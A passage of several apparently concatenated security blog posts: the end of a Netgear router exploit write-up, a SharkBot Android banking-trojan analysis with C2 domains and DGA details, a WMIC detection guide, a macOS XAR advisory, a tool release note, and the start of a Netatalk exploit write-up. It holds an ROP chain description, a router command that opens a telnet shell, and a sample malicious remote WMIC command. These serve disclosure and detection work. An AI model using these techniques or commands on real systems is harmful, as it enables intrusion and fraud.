Remember we mentioned earlier in this blog post that we can send an HTTP content as big as we want and a heap buffer of that size will be allocated? Now we have a use for it. By sending an HTTP content of e.g. 0x1000000 (16MB), we noticed it gets allocated outside of the [heap] region and above the libraries. More specifically we noticed by testing that an address in the range 0x401xxxxx-0x403xxxxx will always be used.

# cat /proc/317/maps
00008000-00018000 r-xp 00000000 1f:03 1429       /usr/bin/KC_PRINT          // static
00018000-00019000 rw-p 00010000 1f:03 1429       /usr/bin/KC_PRINT          // static
00019000-0001c000 rw-p 00000000 00:00 0          [heap]                     // static
4001e000-40023000 r-xp 00000000 1f:03 376        /lib/ld-uClibc.so.0        // ASLR
4002a000-4002b000 r--p 00004000 1f:03 376        /lib/ld-uClibc.so.0
4002b000-4002c000 rw-p 00005000 1f:03 376        /lib/ld-uClibc.so.0
4002f000-40030000 rw-p 00000000 00:00 0
40154000-4015f000 r-xp 00000000 1f:03 265        /lib/libpthread.so.0       // ASLR
4015f000-40166000 ---p 00000000 00:00 0
40166000-40167000 r--p 0000a000 1f:03 265        /lib/libpthread.so.0
40167000-4016c000 rw-p 0000b000 1f:03 265        /lib/libpthread.so.0
4016c000-4016e000 rw-p 00000000 00:00 0
4016e000-401d3000 r-xp 00000000 1f:03 352        /lib/libc.so.0             // ASLR
401d3000-401db000 ---p 00000000 00:00 0
401db000-401dc000 r--p 00065000 1f:03 352        /lib/libc.so.0
401dc000-401dd000 rw-p 00066000 1f:03 352        /lib/libc.so.0
401dd000-401e2000 rw-p 00000000 00:00 0                                     // Broken ASLR
bcdfd000-bce00000 rwxp 00000000 00:00 0
bcffd000-bd000000 rwxp 00000000 00:00 0
bd1fd000-bd200000 rwxp 00000000 00:00 0
bd3fd000-bd400000 rwxp 00000000 00:00 0
bd5fd000-bd600000 rwxp 00000000 00:00 0
bd7fd000-bd800000 rwxp 00000000 00:00 0
bd9fd000-bda00000 rwxp 00000000 00:00 0
bdbfd000-bdc00000 rwxp 00000000 00:00 0
bddfd000-bde00000 rwxp 00000000 00:00 0
bdffd000-be000000 rwxp 00000000 00:00 0
be1fd000-be200000 rwxp 00000000 00:00 0
be3fd000-be400000 rwxp 00000000 00:00 0
beacc000-beaed000 rw-p 00000000 00:00 0          [stack]                    // ASLR

If it gets allocated in the lowest address 0x40100008, it will end at 0x41100008. It means we can spray pages of the same data and get deterministic content at a static address, e.g. 0x41000100.

Finally, looking at the Response_Get_Jobs function’s epilogue, we see POP {R11,PC} which means we can craft a fake R11 and use a gadget like the following to pivot our stack to a new stack where we have data we control to start doing Return Oriented Programming (ROP):

.text:000118A0                 LDR             R3, [R11,#-0x28]
.text:000118A4
.text:000118A4 loc_118A4                               ; Get_JobNode_Print_Job+7D8↑j
.text:000118A4                 MOV             R0, R3
.text:000118A8                 SUB             SP, R11, #4
.text:000118AC                 POP             {R11,PC}

So we can make R11 points to our static region 0x41000100 and also store the command to execute at a static address in that region. Then we use the above gadget to retrieve the address of that command (also stored in that region) in order to set the first argument of system() (in r0) and then pivot to a new stack to that region that will make it finally return to system("any command")

Obtaining a root shell

We decided to use the following command: "nvram set http_passwd=nccgroup && sleep 4 && utelnetd -d -i br0". This is very similar to the method that what was used in the Tokyo drift paper except that in our case we have more control since we are executing all the commands we want so we can set an arbitrary password as well as start the utelnetd process instead of just being able to reset the HTTP password to its default value.

Finally, we use the same trick as the Tokyo drift paper and login to the web interface to re-set the password to the same password, so utelnetd takes into account our new password and we get a remote shell on the Netgear router.

SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store


Authors:

  • Alberto Segura, Malware analyst
  • Rolf Govers, Malware analyst & Forensic IT Expert

NCC Group, as well as many other researchers noticed a rise in Android malware last year, especially Android banking malware. Within the Threat Intelligence team of NCC Group we’re looking closely to several of these malware families to provide valuable information to our customers about these threats. Next to the more popular Android banking malware NCC Group’s Threat Intelligence team also watches new trends and new families that arise and could be potential threats to our customers.

One of these ‘newer’ families is an Android banking malware called SharkBot. During our research we noticed that this malware was distributed via the official Google play store. After discovery we immediately notified Google and decided to share our knowledge via this blog post.

NCC Group’s Threat Intelligence team continues analysis of SharkBot and uncovering new findings. Shortly after we published this blogpost, we found several more SharkBot droppers in the Google Play Store. All appear to behave identically; in fact, the code seems to be a literal a ‘copy-paste’ in all of them. Also the same corresponding C2 server is used in all the other droppers. After discovery we immediately reported this to Google. See the IoCs section below for the Google Play Store URLs of the newly discovered SharkBot dropper apps.

Summary

SharkBot is an Android banking malware found at the end of October 2021 by the Cleafy Threat Intelligence Team. At the moment of writing the SharkBot malware doesn’t seem to have any relations with other Android banking malware like Flubot, Cerberus/Alien, Anatsa/Teabot, Oscorp, etc.

The Cleafy blogpost stated that the main goal of SharkBot is to initiate money transfers (from compromised devices) via Automatic Transfer Systems (ATS). As far as we observed, this technique is an advanced attack technique which isn’t used regularly within Android malware. It enables adversaries to auto-fill fields in legitimate mobile banking apps and initate money transfers, where other Android banking malware, like Anatsa/Teabot or Oscorp, require a live operator to insert and authorize money transfers. This technique also allows adversaries to scale up their operations with minimum effort.

The ATS features allow the malware to receive a list of events to be simulated, and them will be simulated in order to do the money transfers. Since this features can be used to simulate touches/clicks and button presses, it can be used to not only automatically transfer money but also install other malicious applications or components. This is the case of the SharkBot version that we found in the Google Play Store, which seems to be a reduced version of SharkBot with the minimum required features, such as ATS, to install a full version of the malware some time after the initial install.

Because of the fact of being distributed via the Google Play Store as a fake Antivirus, we found that they have to include the usage of infected devices in order to spread the malicious app. SharkBot achieves this by abusing the ‘Direct Reply‘ Android feature. This feature is used to automatically send reply notification with a message to download the fake Antivirus app. This spread strategy abusing the Direct Reply feature has been seen recently in another banking malware called Flubot, discovered by ThreatFabric.

What is interesting and different from the other families is that SharkBot likely uses ATS to also bypass multi-factor authentication mechanisms, including behavioral detection like bio-metrics, while at the same time it also includes more classic features to steal user’s credentials.

Money and Credential Stealing features

SharkBot implements the four main strategies to steal banking credentials in Android:

  • Injections (overlay attack): SharkBot can steal credentials by showing a WebView with a fake log in website (phishing) as soon as it detects the official banking app has been opened.
  • Keylogging: Sharkbot can steal credentials by logging accessibility events (related to text fields changes and buttons clicked) and sending these logs to the command and control server (C2).
  • SMS intercept: Sharkbot has the ability to intercept/hide SMS messages.
  • Remote control/ATS: Sharkbot has the ability to obtain full remote control of an Android device (via Accessibility Services).

For most of these features, SharkBot needs the victim to enable the Accessibility Permissions & Services. These permissions allows Android banking malware to intercept all the accessibility events produced by the interaction of the user with the User Interface, including button presses, touches, TextField changes (useful for the keylogging features), etc. The intercepted accessibility events also allow to detect the foreground application, so banking malware also use these permissions to detect when a targeted app is open, in order to show the web injections to steal user’s credentials.

Delivery

Sharkbot is distributed via the Google Play Store, but also using something relatively new in the Android malware: ‘Direct reply‘ feature for notifications. With this feature, the C2 can provide as message to the malware which will be used to automatically reply the incoming notifications received in the infected device. This has been recently introduced by Flubot to distribute the malware using the infected devices, but it seems SharkBot threat actors have also included this feature in recent versions.

In the following image we can see the code of SharkBot used to intercept new notifications and automatically reply them with the received message from the C2.

In the following picture we can see the ‘autoReply’ command received by our infected test device, which contains a shortten Bit.ly link which redirects to the Google Play Store sample.

We detected the SharkBot reduced version published in the Google Play on 28th February, but the last update was on 10th February, so the app has been published for some time now. This reduced version uses a very similar protocol to communicate with the C2 (RC4 to encrypt the payload and Public RSA key used to encrypt the RC4 key, so the C2 server can decrypt the request and encrypt the response using the same key). This SharkBot version, which we can call SharkBotDropper is mainly used to download a fully featured SharkBot from the C2 server, which will be installed by using the Automatic Transfer System (ATS) (simulating click and touches with the Accessibility permissions).

This malicious dropper is published in the Google Play Store as a fake Antivirus, which really has two main goals (and commands to receive from C2):

  • Spread the malware using ‘Auto reply’ feature: It can receive an ‘autoReply’ command with the message that should be used to automatically reply any notification received in the infected device. During our research, it has been spreading the same Google Play dropper via a shorten Bit.ly URL.
  • Dropper+ATS: The ATS features are used to install the downloaded SharkBot sample obtained from the C2. In the following image we can see the decrypted response received from the C2, in which the dropper receives the command ‘b‘ to download the full SharkBot sample from the provided URL and the ATS events to simulate in order to get the malware installed.

With this command, the app installed from the Google Play Store is able to install and enable Accessibility Permissions for the fully featured SharkBot sample it downloaded. It will be used to finally perform the ATS fraud to steal money and credentials from the victims.

The fake Antivirus app, the SharkBotDropper, published in the Google Play Store has more than 1,000 downloads, and some fake comments like ‘It works good’, but also other comments from victims that realized that this app does some weird things.

Technical analysis

Protocol & C2

The protocol used to communicate with the C2 servers is an HTTP based protocol. The HTTP requests are made in plain, since it doesn’t use HTTPs. Even so, the actual payload with the information sent and received is encrypted using RC4. The RC4 key used to encrypt the information is randomly generated for each request, and encrypted using the RSA Public Key hardcoded in each sample. That way, the C2 can decrypt the encrypted key (rkey field in the HTTP POST request) and finally decrypt the sent payload (rdata field in the HTTP POST request).

If we take a look at the decrypted payload, we can see how SharkBot is simply using JSON to send different information about the infected device and receive the commands to be executed from the C2. In the following image we can see the decrypted RC4 payload which has been sent from an infected device.

Two important fields sent in the requests are:

  • ownerID
  • botnetID

Those parameters are hardcoded and have the same value in the analyzed samples. We think those values can be used in the future to identify different buyers of this malware, which based on our investigation is not being sold in underground forums yet.

Domain Generation Algorithm

SharkBot includes one or two domains/URLs which should be registered and working, but in case the hardcoded C2 servers were taken down, it also includes a Domain Generation Algorithm (DGA) to be able to communicate with a new C2 server in the future.

The DGA uses the current date and a specific suffix string (‘pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf’) to finally encode that in base64 and get the first 19 characters. Then, it append different TLDs to generate the final candidate domain.

The date elements used are:

  • Week of the year (v1.get(3) in the code)
  • Year (v1.get(1) in the code)

It uses the ‘+’ operator, but since the week of the year and the year are Integers, they are added instead of appended, so for example: for the second week of 2022, the generated string to be base64 encoded is: 2 + 2022 + “pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf” = 2024 + “pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf” = “2024pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf”.

In previous versions of SharkBot (from November-December of 2021), it only used the current week of the year to generate the domain. Including the year to the generation algorithm seems to be an update for a better support of the new year 2022.

Commands

SharkBot can receive different commands from the C2 server in order to execute different actions in the infected device such as sending text messages, download files, show injections, etc. The list of commands it can receive and execute is as follows:

  • smsSend: used to send a text message to the specified phone number by the TAs
  • updateLib: used to request the malware downloads a new JAR file from the specified URL, which should contain an updated version of the malware
  • updateSQL: used to send the SQL query to be executed in the SQLite database which Sharkbot uses to save the configuration of the malware (injections, etc.)
  • stopAll: used to reset/stop the ATS feature, stopping the in progress automation.
  • updateConfig: used to send an updated config to the malware.
  • uninstallApp: used to uninstall the specified app from the infected device
  • changeSmsAdmin: used to change the SMS manager app
  • getDoze: used to check if the permissions to ignore battery optimization are enabled, and show the Android settings to disable them if they aren’t
  • sendInject: used to show an overlay to steal user’s credentials
  • getNotify: used to show the Notification Listener settings if they are not enabled for the malware. With this permissions enabled, Sharkbot will be able to intercept notifications and send them to the C2
  • APP_STOP_VIEW: used to close the specified app, so every time the user tries to open that app, the Accessibility Service with close it
  • downloadFile: used to download one file from the specified URL
  • updateTimeKnock: used to update the last request timestamp for the bot
  • localATS: used to enable ATS attacks. It includes a JSON array with the different events/actions it should simulate to perform ATS (button clicks, etc.)

Automatic Transfer System

One of the distinctive parts of SharkBot is that it uses a technique known as Automatic Transfer System (ATS). ATS is a relatively new technique used by banking malware for Android.

To summarize ATS can be compared with webinject, only serving a different purpose. Rather then gathering credentials for use/scale it uses the credentials for automatically initiating wire transfers on the endpoint itself (so without needing to log in and bypassing 2FA or other anti-fraud measures). However, it is very individually tailored and request quite some maintenance for each bank, amount, money mules etc. This is probably one of the reasons ATS isn’t that popular amongst (Android) banking malware.

How does it work?

Once a target logs into their banking app the malware would receive an array of events (clicks/touches, button presses, gestures, etc.) to be simulated in an specific order. Those events are used to simulate the interaction of the victim with the banking app to make money transfers, as if the user were doing the money transfer by himself.

This way, the money transfer is made from the device of the victim by simulating different events, which make much more difficult to detect the fraud by fraud detection systems.

IoCs

Sample Hashes:

  • a56dacc093823dc1d266d68ddfba04b2265e613dcc4b69f350873b485b9e1f1c (Google Play SharkBotDropper)
  • 9701bef2231ecd20d52f8fd2defa4374bffc35a721e4be4519bda8f5f353e27a (Dropped SharkBot v1.64.1)
  • 20e8688726e843e9119b33be88ef642cb646f1163dce4109b8b8a2c792b5f9fc (Google play SharkBot dropper)
  • 187b9f5de09d82d2afbad9e139600617685095c26c4304aaf67a440338e0a9b6 (Google play SharkBot dropper)
  • e5b96e80935ca83bbe895f6239eabca1337dc575a066bb6ae2b56faacd29dd (Google play SharkBot dropper)

SharkBotDropper C2:

  • hxxp://statscodicefiscale[.]xyz/stats/

‘Auto/Direct Reply’ URL used to distribute the malware:

  • hxxps://bit[.]ly/34ArUxI

Google Play Store URL:

C2 servers/Domains for SharkBot:

  • n3bvakjjouxir0zkzmd[.]xyz (185.219.221.99)
  • mjayoxbvakjjouxir0z[.]xyz (185.219.221.99)

RSA Public Key used to encrypt RC4 key in SharkBot:

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2R7nRj0JMouviqMisFYt0F2QnScoofoR7svCcjrQcTUe7tKKweDnSetdz1A+PLNtk7wKJk+SE3tcVB7KQS/WrdsEaE9CBVJ5YmDpqGaLK9qZhAprWuKdnFU8jZ8KjNh8fXyt8UlcO9ABgiGbuyuzXgyQVbzFfOfEqccSNlIBY3s+LtKkwb2k5GI938X/4SCX3v0r2CKlVU5ZLYYuOUzDLNl6KSToZIx5VSAB3VYp1xYurRLRPb2ncwmunb9sJUTnlwypmBCKcwTxhsFVAEvpz75opuMgv8ba9Hs0Q21PChxu98jNPsgIwUn3xmsMUl0rNgBC3MaPs8nSgcT4oUXaVwIDAQAB

RSA Public Key used to encrypt RC4 Key in the Google Play SharkBotDropper:

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9qo1QgM8FH7oAkCLkNO5XfQBUdl+pI4u2tvyFiZZ6hMZ07QnlYazgRmWcC5j5H2iV+74gQ9+1cgjnVSszGbIwVJOQAEZGRpSFT7BhAhA4+PTjH6CCkiyZTk7zURvgBCrXz6+B1XH0OcD4YUYs4OGj8Pd2KY6zVocmvcczkwiU1LEDXo3PxPbwOTpgJL+ySWUgnKcZIBffTiKZkry0xR8vD/d7dVHmZnhJS56UNefegm4aokHPmvzD9p9n3ez1ydzfLJARb5vg0gHcFZMjf6MhuAeihFMUfLLtddgo00Zs4wFay2mPYrpn2x2pYineZEzSvLXbnxuUnkFqNmMV4UJwIDAQAB

Microsoft announces the WMIC command is being retired, Long Live PowerShell

10 March 2022 at 01:15

Category:  Detection and Threat Hunting

What is WMIC?

The Windows Management Instrumentation (WMI) Command-Line Utility (WMIC) is a command-line utility that allows users to perform WMI operations from a command prompt. WMI is an interface providing a variety of Windows management functions. Applications and WMI scripts can be deployed to automate administrative tasks on remote computers or interface with other Windows tools like System Center Operations Manager (SCCM) or Windows Remote Management (WinRM).

Unfortunately for defenders, default WMIC logging is minimal and primarily runs directly in memory without writing any files to disk. Due to WMI’s built-in capabilities and small forensic surface area, attackers often weaponize WMI for all facets of the post-exploit attack chain.

Malicious WMIC Usage

  • cmd.exe /c “wmic /node:”10.123.34.123″ /user:”WorkGroup\Bob-admin” /password:”Summer2022″ PROCESS CALL CREATE “cmd.exe /c C:\ProgramData\regit.bat” >> C:\WINDOWS\TEMP\cb66E3.tmp

In the example above, an attacker has already gained Administrator privileges to execute a WMIC command. Here, the actor launches a malicious payload against a remote host and saves the results to a temp file. Fortunately for defenders, if command line audit logging is enabled, the Windows Security log would capture this execution under event ID 4688. However, these actions would not have been captured if the attacker simply called “wmic” and conducted their operations within the WMI console. There is no recorded logging by leveraging the console, making it a good tool for attackers to live off the land with little fear of detection.

Goodbye WMIC, Hello PowerShell

Microsoft is reportedly no longer developing the WMIC command-line tool and will be removed from Windows 11, 10, and Server builds going forward. However, WMI functionality will still be available via PowerShell. So now is a great time to consider how attackers will adjust to these developments and start tuning your detections accordingly.

Preparation

The default settings of Windows logging rarely will catch advanced attacks.  Therefore, Windows Advanced Audit Logging and PowerShell Audit Logging must be optimally configured to collect and allow detection and able to threat hunt for malicious WMI and similar attacks.

Organizations should have a standard procedure to configure the Windows Advanced Audit Policies as a part of a complete security program and have each Windows system collect locally significant events.  NCC Group recommends using the following resource to configure Windows Advanced Audit Policies:

  • Malware Archaeology Windows Logging Cheat Sheets
  • Malware Archaeology Windows PowerShell Logging Cheat Sheet

Log rotation can be another major issue with Windows default log settings.  By leveraging Group Policy, organizations should increase the default log size to support detection engineering and threat hunting, as outlined below.

Ideally, organizations should forward event logs to a log management or SIEM solution to operationalize detection alerts and provide a central console where threat hunting can be performed.  Alternatively, with optimally configured log sizes, teams can run tools such as PowerShell or LOG-MD to hunt for malicious activity against the local log data as well.  Properly configured logging will save time during incident response activities, allowing an organization to recover faster and spend less money on investigative and recovery efforts.

Detection and Threat Hunting Malicious WMI in PowerShell logging

WMI will generate log events that can be used to detect and hunt for indications of execution.  To collect Event ID 4104, the Windows PowerShell Audit Policy will need to have the following policy enabled:

  • PowerShell version 5 or later must be installed
    • Requires .Net 4.5 or later
  • Minimum Log size – 1,024,000kb or larger
  • There are two PowerShell logs
    • Windows PowerShell (legacy)
    • Applications and Services Logs – Microsoft-Windows-PowerShell/Operational
  • The following Group Policy must be set
    • ModuleLogging Reg_DWord =1 or ENABLED
    • ModuleNames Reg_Sz – Value = * and Data = *
    • ScriptBlockLogging Reg_DWord =1 or ENABLED

The following query logic can be used:

  • Event Log = PowerShell/Operational
  • Event IDs = 4100, 4103, 4104
  • User = Any user, especially administrative accounts
  • Path = Look for odd paths or PowerShell scripts
  • ScriptBlock = What was actually executed on the system that will contain the cmdlets listed below

WMI PowerShell cmdlets

The following PowerShell cmdlets should be monitored for suspicious/malicious activity:

  • Cmdlet          Get-WmiObject
  • Cmdlet          Invoke-WmiMethod
  • Cmdlet          Register-WmiEvent
  • Cmdlet          Remove-WmiObject
  • Cmdlet          Set-WmiInstance

Also, the following PowerShell CIM (Common Information Model) cmdlets should also be monitored as a replacement to older WMI cmdlets:

  • Cmdlet          Export-BinaryMiLog
  • Cmdlet          Get-CimAssociatedInstance
  • Cmdlet          Get-CimClass
  • Cmdlet          Get-CimInstance
  • Cmdlet          Get-CimSession
  • Cmdlet          Import-BinaryMiLog
  • Cmdlet          Invoke-CimMethod
  • Cmdlet          New-CimInstance
  • Cmdlet          New-CimSession
  • Cmdlet          New-CimSessionOption
  • Cmdlet          Register-CimIndicationEvent
  • Cmdlet          Remove-CimInstance
  • Cmdlet          Remove-CimSession
  • Cmdlet          Set-CimInstance        

Sample Log Management Query

The following query is based on Elastic’s WinLogBeat version 7 agent.

event.provider="Microsoft-Windows-PowerShell" AND event.code=4104 // PowerShell WMI commandlets (winlog.event_data.ScriptBlockText="*Get-WmiObject*") or (winlog.event_data.ScriptBlockText="*Invoke-WmiMethod*") or (winlog.event_data.ScriptBlockText="*Register-WmiEvent*") or (winlog.event_data.ScriptBlockText="*Remove-WmiObject*") or (winlog.event_data.ScriptBlockText="*Set-WmiInstance*")  | UserName:=winlog.user.name | Domain:=winlog.user.domain | ScriptBlock:=winlog.event_data.ScriptBlockText | User_Type:=winlog.user.type | PID:=winlog.process.pid | Task:=winlog.task | Path:=winlog.event_data.Path | OpCode:=winlog.opcode | table([@timestamp, host.name, UserName, Domain, User_Type, Path, Task, OpCode, ScriptBlock])

Detection Engineering – Filtering Known Good

Once an output of all WMI PowerShell cmdlets is produced, you can start filtering known good activity to narrow the results to suspicious activity. Take the following example:

The following is a typical result that might be seen in the logs, and in this case excluded as a false positive or known good to reduce results.  The path of the PowerShell script or the actual PowerShell executed (ScriptBlock) is what to focus on.

In this example, our focus is on the highlighted PowerShell executed (ScriptBlock). Here the command is just checking the disk for an install routine which is typical on a Windows system.  From here, you can begin building out your detection logic to better find suspicious WMI PowerShell activity and support threat hunting efforts.  Play close attention to the names of the scripts, location of where the script executes, the context of the user executing the script, the quantity of systems the script runs on, and the calls being used in order to filter out the known good items.  Generally, directories that users have read-write access should be closely reviewed such as; C:\Users.

Conclusion

WMI and WMIC have been consistent attack vectors since their introduction. With the deprecation of WMIC, malicious usage WMI functionality with PowerShell will likely increase. We hope this information can assist your detection and threat hunting efforts to detect this and similar types of attacks. Happy Detection and Hunting!

Additional Reading and Resources

Technical Advisory – Apple macOS XAR – Arbitrary File Write (CVE-2022-22582)

15 March 2022 at 19:34
Vendor: Apple
Vendor URL: https://www.apple.com/
Systems Affected: macOS Monterey before 12.3, macOS Big Sur before 11.6.5 and macOS 10.15 Catalina before Security Update 2022-003
Author: Richard Warren <richard.warren[at]nccgroup[dot]trust>
Advisory URLs: https://support.apple.com/en-us/HT213183, https://support.apple.com/en-us/HT213185, https://support.apple.com/en-gw/HT213185
CVE Identifier: CVE-2022-22582
Risk: 5.0 Medium CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N

Summary

In October 2021, Apple released a fix for CVE-2021-30833. This was an arbitrary file-write vulnerability in the xar utility and was due to improper handling of path separation (forward-slash) characters when processing files contained within directory symlinks.

Whilst analysing the patch for CVE-2021-30833, an additional vulnerability was identified which could allow for arbitrary file-write when unpacking a malicious XAR archive using the xar utility.

Impact

An attacker could construct a maliciously crafted .xar file, which when extracted by a user, would result in files being written to a location of the attacker’s choosing. This could be abused to gain Remote Code Execution.

Details

Following the patch of CVE-2021-30833, files containing a forward-slash within the name property would be converted to a : character instead, as shown in the screenshot below:

As mentioned in the previous advisory, when attempting to extract a .xar file which contains both a directory symlink and a directory with the same name, an error is encountered, as the directory is created before the symlink.

However, after some experimentation, it was noted that xar processes the Table of Contents (TOC) backwards, this is demonstrated in the following example.

First, we create a .xar file with a TOC containing three entries – a, b, and c:

When listing the contents, we can see that the symlink directory ‘c’ is processed first:

This means that putting a directory symlink before the real directory (i.e., first from the top-down) within the TOC would cause it to fail with the message shown previously – since xar will refuse to create a symlink if a directory with the same name already exists – at which point it will skip over the symlink creation and just write the file to the real directory instead.

However, if we put the symlink directory at the end of the TOC, this will cause the symlink directory creation to succeed but the real-directory creation to fail – but, crucially, xar continues execution anyway, creating the file within our newly-created symlink-directory.

In summary, this means if we create a TOC with a symlink directory at the end, and a directory containing a file at the beginning, we can cause xar to:

  1. First create the symlink directory
  2. Try to create the directory (and fail, but continue)
  3. Write the file into our symlink directory (achieving arbitrary file-write)

The following is an example of a TOC which exploits this vulnerability:

Now when extracting this file, we can see that the file /tmp/test is created successfully:

Recommendation

Upgrade to macOS Monterey 12.3, macOS Big Sur 11.6.5, macOS 10.15 Security Update 2022-003, or later.

Vendor Communication

2021-10-28 – Reported to Apple.
2022-03-14 – macOS 12.3, 11.6.5 and Security Update 2022-003 released, and Apple advisory published.
2022-03-15 – NCC Group advisory published.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  2022-03-15

Written by:  Richard Warren

Tool Release – ScoutSuite 5.11.0

We’re proud to announce the release of a new version of our open-source, multi-cloud auditing tool ScoutSuite (on Github)!

The most significant improvements and features added include:

  • Core
    • Improved CLI options, test coverage and some dependencies
  • AWS
    • Added new findings for multiple services
    • Bug fixes
    • Added ARNs for all resources
  • Azure
    • Added new findings
    • Bug fixes
  • GCP
    • New ruleset for GCP CIS version 1.1
    • Added support for multiple resources
    • Included a good number of new findings, most of which were added to the default ruleset
    • Bug fixes

Check out the Github page for additional information, as well as the wiki documentation!

For those wanting a Software-as-a-Service version, we also offer NCC Scout. This service includes persistent monitoring, as well as coverage of additional services across the three major public cloud platforms. If you would like to hear more, reach out to [email protected] or visit our cyberstore!

Remote Code Execution on Western Digital PR4100 NAS (CVE-2022-23121)

24 March 2022 at 13:13
Mooncake Exploit

Summary

This blog post describes an unchecked return value vulnerability found and exploited in September 2021 by Alex Plaskett, Cedric Halbronn and Aaron Adams working at the Exploit Development Group (EDG) of NCC Group. We successfully exploited it at Pwn2Own 2021 competition in November 2021 when targeting the Western Digital PR4100. Western Digital published a firmware update (5.19.117) which entirely removed support for the open source third party vulnerable service "Depreciated Netatalk Service". As this vulnerability was addressed in the upstream Netatalk code, CVE-2022-23121 was assigned and a ZDI advisory published together with a new Netatalk release 3.1.13 distributed which fixed this vulnerability together with a number of others.

Introduction

The vulnerability is in the Netatalk project, which is an open-source implementation of the Apple Filing Protocol (AFP). The Netatalk code is implemented in the /usr/sbin/afpd service and the /lib64/libatalk.so library. The afpd service is running by default on the Western Digital My Cloud Pro Series PR4100 NAS.

This vulnerability can be exploited remotely and does not need authentication. It allows an attacker to get remote code execution as the nobody user on the NAS. This user can access private shares that would normally require authentication.

We have analysed and exploited the vulnerability on the 5.17.107 version, which we detail below but older versions are likely vulnerable too.

Note: The Western Digital My Cloud Pro Series PR4100 NAS is based on the x86_64 architecture.

We have named our exploit "Mooncake". This is because we finished writing our exploit on the 21st September 2021, which happens to be the day of the Mid-Autumn Festival a.k.a Mooncake festival in 2021.

Vulnerability details

Background

DSI / AFP protocols

The Apple Filing Protocol (AFP) is an alternative to the well known Server Message Block (SMB) protocol to share files over the network. The AFP specification can be found here.

AFP is transmitted over the Data Stream Interface (DSI) protocol, itself transmitted over TCP/IP, on TCP port 548.

However, SMB seems to have won the file sharing network protocols battle and AFP is less known, even if still supported in devices such as NAS. The AFP protocol was deprecated in OS X 10.9 and AFP server was removed in OS X 11.

Netatalk

The Netatalk project is an implementation of AFP/DSI for UNIX platforms that was moved to SourceForge in 2000. Its original purposes was to allow UNIX-like operating systems to serve as AFP servers for many Macintosh / OS X clients.

As detailed earlier, AFP is getting less and less interest. This is reflected in the Netatalk project too. The latest Netatalk’s stable release (3.1.12) was released in December 2018 which makes it a rather deprecated and unsupported project.

The Netatalk project was vulnerable to the CVE-2018-1160 vulnerability which was an out-of-bounds write in the DSIOpensession command (dsi_opensession()) in Netatalk < 3.1.12. This was successfully exploited on Seagate NAS due to no ASLR and later on environments with ASLR as part of the Hitcon 2019 CTF challenge.

AppleDouble file format

The AppleSingle and AppleDouble file formats aim to store regular files’ metadata and allows sharing that information between different filesystems without having to worry about interoperability.

The main idea is based on the fact that any filesystem allows to store files as a series of bytes. So it is possible to save regular files’ metadata (a.k.a attributes) into additional files along the regular files and reflect these attributes back to the other end (or at least some of them) if the other end’s filesystem supports them. Otherwise, the additional attributes can be discarded.

The AppleSingle and AppleDouble specification can be found here. The AppleDouble file format is also explained in the samba source code with this diagram:

/*
   "._" AppleDouble Header File Layout:
         MAGIC          0x00051607
         VERSION        0x00020000
         FILLER         0
         COUNT          2
     .-- AD ENTRY[0]    Finder Info Entry (must be first)
  .--+-- AD ENTRY[1]    Resource Fork Entry (must be last)
  |  |   /////////////
  |  '-> FINDER INFO    Fixed Size Data (32 Bytes)
  |      ~~~~~~~~~~~~~  2 Bytes Padding
  |      EXT ATTR HDR   Fixed Size Data (36 Bytes)
  |      /////////////
  |      ATTR ENTRY[0] --.
  |      ATTR ENTRY[1] --+--.
  |      ATTR ENTRY[2] --+--+--.
  |         ...          |  |  |
  |      ATTR ENTRY[N] --+--+--+--.
  |      ATTR DATA 0   <-'  |  |  |
  |      ////////////       |  |  |
  |      ATTR DATA 1   <----'  |  |
  |      /////////////         |  |
  |      ATTR DATA 2   <-------'  |
  |      /////////////            |
  |         ...                   |
  |      ATTR DATA N   <----------'
  |      /////////////
  |         ...          Attribute Free Space
  |
  '----> RESOURCE FORK
            ...          Variable Sized Data
            ...
*/

The afpd binary and libatalk.so library don’t have symbols. However, Western Digital published the Netatalk open-source based implementation they used, as well as the patches they implemented in here due to the GNU General Public License (GPL). The latest source code archive Western Digital published was for version 5.16.105 and does not match the latest version analysed (5.17.107). However, we have confirmed that afpd and netatalk.so have never been modified in all OS 5 versions so far. Consequently, the code shown below is generally refering to the Netatalk source code.

NOTE: Western Digital PR4100 uses the latest 3.1.12 netatalk source code as a base.

Let’s analyse how the netatalk code accepts client connections, parses AFP requests to reach the vulnerable code when dealing with opening fork files stored in the AppleDouble file format.

The main() entry point function initialises lots of objects in memory, loads the AFP configuration, and starts listening on the AFP port (TCP 548).

//netatalk-3.1.12/etc/afpd/main.c
int main(int ac, char **av)
{
    ...
    /* wait for an appleshare connection. parent remains in the loop
     * while the children get handled by afp_over_{asp,dsi}.  this is
     * currently vulnerable to a denial-of-service attack if a
     * connection is made without an actual login attempt being made
     * afterwards. establishing timeouts for logins is a possible
     * solution. */
    while (1) {
        ...
        for (int i = 0; i < asev->used; i++) {
            if (asev->fdset[i].revents & (POLLIN | POLLERR | POLLHUP | POLLNVAL)) {
                switch (asev->data[i].fdtype) {

                case LISTEN_FD:
                    if ((child = dsi_start(&obj, (DSI *)(asev->data[i].private), server_children))) {
                        ...
                    }
                    break;
    ...
```

The dsi_start() function basically calls into 2 functions: dsi_getsession() and afp_over_dsi().

//netatalk-3.1.12/etc/afpd/main.c
static afp_child_t *dsi_start(AFPObj *obj, DSI *dsi, server_child_t *server_children)
{
    afp_child_t *child = NULL;

    if (dsi_getsession(dsi, server_children, obj->options.tickleval, &child) != 0) {
        LOG(log_error, logtype_afpd, "dsi_start: session error: %s", strerror(errno));
        return NULL;
    }

    /* we've forked. */
    if (child == NULL) {
        configfree(obj, dsi);
        afp_over_dsi(obj); /* start a session */
        exit (0);
    }

    return child;
}

The dsi_getsession() calls into a dsi->proto_open function pointer which is dsi_tcp_open():

//netatalk-3.1.12/libatalk/dsi/dsi_getsess.c
/*!
